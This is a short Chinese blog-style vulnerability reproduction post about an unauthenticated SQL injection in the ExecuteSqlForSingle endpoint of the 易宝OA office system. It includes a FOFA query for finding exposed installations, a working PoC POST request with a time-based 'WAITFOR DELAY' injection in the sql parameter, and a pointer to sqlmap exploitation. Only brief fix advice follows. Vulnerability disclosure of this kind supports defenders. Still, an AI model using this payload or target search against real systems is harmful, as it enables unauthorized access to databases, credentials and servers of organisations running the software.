本文主要是介绍易宝OA ExecuteSqlForSingle SQL注入漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台,具有信息管理、 流程管理 、知识管理(档案和业务管理)、协同办公等多种功能。
0x02 漏洞概述
易宝OA ExecuteSqlForSingle接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息,用户名密码等凭据,进一步利用可获取服务器权限
0x03 复现环境
FOFA:product="顶讯科技-易宝OA系统"
0x04 漏洞复现
PoC
POST /api/system/ExecuteSqlForSingle HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36token=zxh&sql=;WAITFOR DELAY '0:0:5'--&strParameters延时5秒
SQLmap利用
0x05 修复建议
关闭互联网暴露面或接口设置访问控制
升级至安全版本
这篇关于易宝OA ExecuteSqlForSingle SQL注入漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
